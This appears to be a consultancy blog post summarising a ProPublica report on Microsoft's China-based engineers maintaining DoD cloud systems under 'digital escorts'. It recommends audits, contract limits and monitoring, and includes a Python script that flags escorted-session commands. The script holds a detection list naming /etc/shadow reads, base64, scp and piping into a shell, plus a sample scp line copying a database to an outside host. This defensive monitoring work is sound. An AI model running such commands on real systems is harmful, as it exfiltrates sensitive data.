A recent ProPublica investigation reveals that Microsoft employs engineers based in China to maintain DoD computer systems, focusing on cloud services for sensitive but unclassified “high impact level” data (Impact Levels 4 and 5) supporting military operations. Compromise of this data could severely affect national security, operations, assets, and individuals. This arrangement, ongoing for nearly a decade and first reported by ProPublica, was crucial for Microsoft’s federal cloud contracts.
To reduce risk, Microsoft employs “digital escorts”—U.S. citizens with security clearances—who remotely monitor foreign engineers. Many escorts lack advanced technical skills, with some being former military personnel without coding experience and paid near minimum wage. This limits their ability to detect malicious actions, creating vulnerabilities. Internal Microsoft warnings cited espionage risks, especially given China’s cyber threat status (e.g., the 2023 U.S. officials’ email hack). Experts, including former intelligence officials like Harry Coker, consider this a greater threat than TikTok data concerns.
Microsoft states it complies with government requirements, including no direct foreign data access, specialized escort training, and an internal “Lockbox” review. However, former DoD officials like John Sherman were unaware and called for reviews. The Defense Information Systems Agency (DISA) requires providers to vet specialists but did not address escort qualifications. Other cloud providers (AWS, Google, Oracle) did not confirm similar practices.
Measures for Prevention
To avert the vulnerabilities described—such as insufficient scrutiny of foreign engineers gaining access to sensitive systems, which can lead to risks associated with espionage, sabotage, or data breaches—both government agencies and commercial companies can adopt several countermeasures. These focus on boosting security controls, limiting reliance on risky personnel, and ramping up monitoring.
Some basic recommended controls follow below.
Conduct Comprehensive Audits and Reviews:
Order independent audits immediately of the cloud service providers’ operations, and make sure these are performed by U.S. persons (not foreign contractors). For cloud services that work with the DoD, it would be prudent (and in keeping with the suggestion by former DoD CIO John Sherman) for DISA or Cyber Command to lead a thorough review first of the service itself and then of its supply chain.
Strengthen Contractual Requirements:
Revise procurement contracts to bar or severely restrict engineers from hostile countries (like China) from maintaining high-impact data. Mandate that all critical support be performed by personnel in the U.S., who have been security cleared and possess the verified technical chops to do the job.
Enhance Vetting and Qualification Standards:
Set minimum qualification standards for digital escorts (or similar roles). For example, the new minimums could include mandatory technical certifications (such as those in cybersecurity or cloud engineering), a pay scale that attracts skilled talent, and ongoing training for digital escorts.
Implement Advanced Monitoring and Access Controls:
Mandate real-time logging, AI-driven anomaly detection, and multi-factor authentication for all system access. Agencies should implement government-operated tools to independently monitor sessions and allow escorts to flag any suspicious scripts or activities.
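One way a government-operated monitoring tool could support the escort is to check each command from an escorted session against the change ticket agreed before the session started. The following is an added illustration, not code from the article, Microsoft, or any DoD tool; the ticket format, hostnames, and transcript lines are all constructed for the example.

```python
"""Escorted-session command review (added example; ticket and transcript are constructed)."""
import re
from datetime import datetime, timezone

# Hypothetical change ticket: host, time window, and command scope agreed up front.
TICKET = {
    "hosts": {"il5-app-01"},
    "window": (datetime(2025, 7, 1, 14, 0, tzinfo=timezone.utc),
               datetime(2025, 7, 1, 16, 0, tzinfo=timezone.utc)),
    # Only read-only service checks and one config reload are in scope.
    "allowed": [r"^systemctl status \S+$", r"^journalctl ", r"^systemctl reload nginx$"],
}

# Patterns that are always surfaced for the escort, whatever the ticket says.
HIGH_RISK = [r"\bscp\b", r"\bbase64\b", r"/etc/shadow", r"\bsudo\s+su\b", r"\|\s*(ba)?sh\b"]

# Transcript line format assumed here: '<ISO timestamp> <operator> <host> <command>'
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.+)$")

def review_session(transcript: str, ticket: dict = TICKET) -> list:
    """Return every transcript entry that is out of scope or high risk, with reasons."""
    findings = []
    start, end = ticket["window"]
    for raw in transcript.strip().splitlines():
        m = LINE_RE.match(raw)
        if not m:
            findings.append({"line": raw, "reasons": ["unparseable entry"]})
            continue
        ts, operator, host, cmd = m.groups()
        when = datetime.fromisoformat(ts)
        reasons = []
        if not (start <= when <= end):
            reasons.append("outside approved window")
        if host not in ticket["hosts"]:
            reasons.append("host not in ticket")
        if not any(re.search(p, cmd) for p in ticket["allowed"]):
            reasons.append("command not in approved scope")
        if any(re.search(p, cmd) for p in HIGH_RISK):
            reasons.append("high-risk pattern")
        if reasons:
            findings.append({"line": raw, "operator": operator, "reasons": reasons})
    return findings

# Constructed transcript: two in-scope commands, then three that the escort should see.
SAMPLE = """
2025-07-01T14:05:00+00:00 eng-remote il5-app-01 systemctl status nginx
2025-07-01T14:07:30+00:00 eng-remote il5-app-01 journalctl -u nginx --since today
2025-07-01T14:20:00+00:00 eng-remote il5-db-02 systemctl status postgresql
2025-07-01T14:25:00+00:00 eng-remote il5-app-01 scp /srv/data/export.db eng@example.invalid:/tmp
2025-07-01T17:10:00+00:00 eng-remote il5-app-01 systemctl reload nginx
"""
```

Running `review_session(SAMPLE)` returns three findings: a command on a host not in the ticket, a bulk copy off the host that is both out of scope and high risk, and a change made after the approved window closed.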
Diversification and Redundancy Planning:
Transition to several cloud providers or a hybrid model to preclude overdependence on any single vendor. Draw up contingency plans for rapid contract termination should any of the confirmed risks materialize. Prioritize sourcing of all IT support from inside the country or from allied countries.
Policy and Regulatory Updates:
ODNI or Congress could issue guidance to classify such arrangements as high-risk and fold them into the broader cyber threat framework. This might include visa restrictions or export controls on sensitive technical knowledge.
These controls use the authority of the government to ensure that compliance happens. They could potentially stop breaches like the Chinese email hacks from happening again.
Require Data Security Audits for all DoD agencies on a semi-annual basis:
A data security audit is a systematic and comprehensive evaluation of an organization’s information systems, processes, policies, and controls related to data handling, storage, and protection. A data security audit at a basic level does the following:
Risk Identification: Identify security weaknesses, such as outdated software, misconfigurations, or poor access controls, that could cause data loss or exploitation.
Compliance Verification: Ensure compliance with legal and industry standards to avoid fines and reputational harm.
Improvement Recommendations: Provide actionable steps to strengthen data integrity, confidentiality, and availability, including ongoing monitoring strategies.
Threat Prevention: Address cyber risks from malware, insider threats, or external hackers to prevent data breaches.
Be Proactive, Not Reactive
Contact TMPC Inc today to learn how we can strengthen your insider threat program and ensure full compliance.
For more information, visit our site, reach out on the contact page, or email us directly at joe.teasley@tmpcinc.com to find out more about proper Insider Threat Risk Management and get in touch with our team about your operations.